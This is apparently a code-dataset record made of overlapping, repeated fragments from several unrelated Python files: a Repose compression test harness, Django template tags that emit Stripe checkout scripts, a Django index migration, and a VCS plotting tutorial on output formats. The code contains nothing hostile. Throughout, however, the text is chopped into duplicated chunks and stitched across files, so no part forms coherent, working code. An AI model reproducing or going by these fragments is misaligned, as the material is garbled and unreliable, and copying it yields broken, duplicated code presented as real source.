self.valve is not None:", "repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml',", "from narwhal import pathutil import xmlrunner as _xmlrunner import logging import time import", "\" \"multiple times. 'all' is the default, and runs all \" \"available test", "deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time)", "'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port", "log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port = 7777 deproxy_port = 9999", "is the default, and runs all \" \"available test cases\", choices=['all'] + test_case_map.keys(),", "if args.test_case is None: args.test_case = ['all'] test_cases = [] test_cases_set = set()", "help=\"Which test case to run. Can be specififed \" \"multiple times. 'all' is", "params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port))", "as _xmlrunner import logging import time import argparse import os import deproxy logger", "not None: self.valve.stop() if self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression", "case to run. Can be specififed \" \"multiple times. 'all' is the default,", "action='append', help=\"Which test case to run. Can be specififed \" \"multiple times. 
'all'", "= %s' % url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc)", "is not None: self.valve.stop() if self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [" ]
[ "error_selector): script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG))", "button_selector, error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag() def", "script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector,", "return element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector, error_selector):", "element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script", "import mark_safe from django_stripe import settings from django_stripe.models import * OPEN_TAG = \"<script>\"", "$('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register", "from django import template from django.utils.safestring import mark_safe from django_stripe import settings from", "CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element() init_script =", ") element = \"\\n\".join((OPEN_TAG, init_script, button_script, CLOSE_TAG)) html = \"\\n\".join((import_element, element)) return mark_safe(html)", "\"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script = 
_get_stripe_button_script(", "settings from django_stripe.models import * OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE =", "return script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script = _get_stripe_init_script()", "element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script", "'{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register = template.Library() def _get_stripe_import_element():", "var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}'", "\"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message);", "script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session,", "= _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element)", "{{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register =", "template.Library() def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script =", "init_script = _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = 
\"\\n\".join((OPEN_TAG,", "import settings from django_stripe.models import * OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE", "CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script( checkout_session, button_selector,", "\"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\"", "template from django.utils.safestring import mark_safe from django_stripe import settings from django_stripe.models import *", "button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def", "(result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register = template.Library() def _get_stripe_import_element(): element =", "src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector,", "@register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element", "return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element() init_script = _get_stripe_init_script()", "button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, init_script, button_script, CLOSE_TAG)) html = \"\\n\".join((import_element, element))", "script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def 
stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element() init_script", "\"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE", "= '<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def", "stripe_init(): script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def", "element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script", "django_stripe.models import * OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\" var", "_get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return", "checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, init_script, button_script, CLOSE_TAG)) html = \"\\n\".join((import_element,", "INIT_TEMPLATE = \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{", "error_selector=error_selector, ) return script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script", "def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG,", "script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script( 
checkout_session,", "button_selector, error_selector): script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, script,", "\"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element()", "script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script = _get_stripe_init_script() element", "from django_stripe.models import * OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\"", "= _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, init_script,", "button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session,", "_get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, init_script, button_script,", "* OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\" var stripe =", "mark_safe from django_stripe import settings from django_stripe.models import * OPEN_TAG = \"<script>\" CLOSE_TAG", "django import template from django.utils.safestring import mark_safe from django_stripe import settings from django_stripe.models", "error_selector ) element = \"\\n\".join((OPEN_TAG, init_script, button_script, CLOSE_TAG)) html = \"\\n\".join((import_element, element)) return", "def stripe_init(): script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag()", "= \"</script>\" INIT_TEMPLATE = \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = 
\"\"\"", "= \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }});", "def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script =", "}}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register = template.Library() def _get_stripe_import_element(): element", "= _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector,", "_get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script = BUTTON_TEMPLATE.format(", "register = template.Library() def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script():", "_get_stripe_button_script(checkout_session, button_selector, error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag()", "return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG))", "script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return", "error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script 
@register.simple_tag() def stripe_import():", "mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return", "{{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register = template.Library() def _get_stripe_import_element(): element = '<script", "= \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\"", "$('{error_selector}').html(result.error.message); }}); }}); \"\"\" register = template.Library() def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>'", "= \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script =", "INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector,", "import template from django.utils.safestring import mark_safe from django_stripe import settings from django_stripe.models import", "_get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, init_script, button_script, CLOSE_TAG)) html =", "= _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, init_script, button_script, CLOSE_TAG)) html", "error_selector ) element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector,", "import_element = _get_stripe_import_element() init_script = _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector, 
error_selector )", ") return script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script =", "mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element() init_script = _get_stripe_init_script() button_script", "@register.simple_tag() def stripe_init(): script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element)", "mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script( checkout_session, button_selector, error_selector )", "_get_stripe_import_element() init_script = _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element =", "\"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId:", "import * OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\" var stripe", "stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function", "stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script,", "OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}');", "@register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script = _get_stripe_init_script() element =", "checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) 
return mark_safe(element) @register.simple_tag() def", "}}); }}); \"\"\" register = template.Library() def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return", "'<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session,", "def _get_stripe_button_script(checkout_session, button_selector, error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script", "\"</script>\" INIT_TEMPLATE = \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function()", "}}); \"\"\" register = template.Library() def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element", "= Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result)", "from django_stripe import settings from django_stripe.models import * OPEN_TAG = \"<script>\" CLOSE_TAG =", ") element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector):", "= INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id,", "_get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector):", 
"error_selector): import_element = _get_stripe_import_element() init_script = _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector", "button_selector, error_selector): import_element = _get_stripe_import_element() init_script = _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector,", "checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init():", "django_stripe import settings from django_stripe.models import * OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\"", "stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element() init_script = _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session,", "script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag() def stripe_import(): return", "def stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element =", "= template.Library() def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script", "return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script( checkout_session, button_selector, error_selector", "\"\"\" register = template.Library() def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element def", "return script def _get_stripe_button_script(checkout_session, button_selector, 
error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, )", "button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, init_script, button_script, CLOSE_TAG))", "element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element", "= _get_stripe_import_element() init_script = _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element", "django.utils.safestring import mark_safe from django_stripe import settings from django_stripe.models import * OPEN_TAG =", "Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{", "def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY)", "stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register = template.Library()", "def stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element() init_script = _get_stripe_init_script() button_script = _get_stripe_button_script(", "= \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{", "@register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element() init_script = 
_get_stripe_init_script() button_script =", "BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag()", "BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }});", "script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return", "= BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element())", "from django.utils.safestring import mark_safe from django_stripe import settings from django_stripe.models import * OPEN_TAG", "sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register = template.Library() def", "stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG,", "_get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag()", "CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE =", "<reponame>itsnamgyu/api-demo from django import template from django.utils.safestring import mark_safe from django_stripe import settings", "= 
\"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element =" ]
[]
[ "dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'),", "class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest',", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ]", "operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ), migrations.AddIndex( model_name='contest', index=models.Index(fields=['end_time'], name='clist_conte_end_tim_341782_idx'), ),", "<gh_stars>100-1000 # Generated by Django 2.1.7 on 2019-11-23 09:53 from django.db import migrations,", "('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ), migrations.AddIndex( model_name='contest',", "] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ), migrations.AddIndex( model_name='contest', index=models.Index(fields=['end_time'], name='clist_conte_end_tim_341782_idx'),", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations", "= [ ('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ),", "'0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ), migrations.AddIndex( model_name='contest', index=models.Index(fields=['end_time'],", "09:53 from django.db import 
migrations, models class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'),", "by Django 2.1.7 on 2019-11-23 09:53 from django.db import migrations, models class Migration(migrations.Migration):", "Django 2.1.7 on 2019-11-23 09:53 from django.db import migrations, models class Migration(migrations.Migration): dependencies", "[ ('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ), migrations.AddIndex(", "models class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex(", "= [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ), migrations.AddIndex( model_name='contest', index=models.Index(fields=['end_time'], name='clist_conte_end_tim_341782_idx'), ), ]", "2.1.7 on 2019-11-23 09:53 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "# Generated by Django 2.1.7 on 2019-11-23 09:53 from django.db import migrations, models", "Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'],", "on 2019-11-23 09:53 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations =", "migrations, models class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations = [", "2019-11-23 09:53 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('clist',", "Generated by Django 2.1.7 on 2019-11-23 09:53 from django.db import migrations, models class" ]
[ "file v.cgm('test.cgm', 'r') # Encapsulated Postscript - append portait output to an existing", "System routines for Mac, DOS, NT, or Posix depending on # the system", "<filename>Packages/Dead/demo/Script/tutorials/orientation_and_output.py # Adapted for numpy/ma/cdms2 by convertcdms.py # Import the modules needed for", "image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM format - append to an existing", "command \"gs --help\" at the terminal # prompt. ############################################################### v.gs(filename='example.jpg', device='jpeg', orientation='p', resolution='1000x1000')", "of the data v.plot( data ) # Changing plot orientation to \"Portrait\" v.portrait()", "quick plot of the data v.plot( data ) # Changing plot orientation to", "values. # os - Operation System routines for Mac, DOS, NT, or Posix", "the plot command! v.open() # A quick plot of the data v.plot( data", "format - append landscape orientation gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM", "v.postscript('test.ps') # GIF format - append landscape orientation gif image v.gif('test.gif', merge='a', orientation='l',", "mainpulate time values. # os - Operation System routines for Mac, DOS, NT,", "miscellaneous routines for # manipulating variables. # time - This module provides various", "# the interpreter and to functions that interact strongly with the interpreter. import", "GhostScript (gs) format # This routine allows the user to save the VCS", "necessary to do this # before issuing the plot command! 
v.open() # A", "maintained by # the interpreter and to functions that interact strongly with the", "format v.pdf ('test.pdf', 'p') ############################################################### # GhostScript (gs) format # This routine allows", "defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200')", "data set data = cdmsfile('clt') # Initialize VCS: v = vcs.init() # Opening", "to an existing file v.postscript('test.ps','a','p') # Overwrite existing postscript file with a new", "# To change the orientation back to \"Landscape\" v.landscape() print \"Generating Landscape output...\"", "device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') #", "cgm file v.cgm('test.cgm', 'a') # Encapsulated Postscript - overwrite an existing eps file", "an existing cgm file v.cgm('test.cgm', 'a') # Encapsulated Postscript - overwrite an existing", "routine allows the user to save the VCS canvas in one of the", "provides access to some objects used or maintained by # the interpreter and", "# manipulating variables. # time - This module provides various functions to mainpulate", "for numpy/ma/cdms2 by convertcdms.py # Import the modules needed for the tuturial #", "Saving \"Landscape\" orientation graphics to file # \"Landscape\" is the default output orientation.", "control System 1D and 2D plotting routines. 
# cdutil - Climate utilitizes that", "# # Saving \"Landscape\" orientation graphics to file # \"Landscape\" is the default", "vcs, cdms2 as cdms, cdutil, time, os, sys # Open data file: filepath", "Overwrite existing postscript file with a new postscript file v.postscript('test.ps','r','p') # GIF format", "- Climate utilitizes that contains miscellaneous routines for # manipulating variables. # time", "postscript output to an existing file v.postscript('test.ps','a','p') # Overwrite existing postscript file with", "v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing plot orientation to", "v.pdf('test.pdf') ############################################################## # GhostScript (gs) format # This routine allows the user to", "- This module provides access to some objects used or maintained by #", "Open data file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath ) #", "Data Management system accesses gridded data. # vcs - Visualization and control System", "NT, or Posix depending on # the system you're on. # sys -", "to save the VCS canvas in one of the many # GhostScript (gs)", "append to an existing cgm file v.cgm('test.cgm', 'a') # Encapsulated Postscript - overwrite", "# CGM format - append to an existing cgm file v.cgm('test.cgm', 'a') #", "Operation System routines for Mac, DOS, NT, or Posix depending on # the", "orientation graphics to file # \"Landscape\" is the default output orientation. # ##############################################################", "'p') ############################################################### # GhostScript (gs) format # This routine allows the user to", "not necessary to do this # before issuing the plot command! v.open() #", "prompt. 
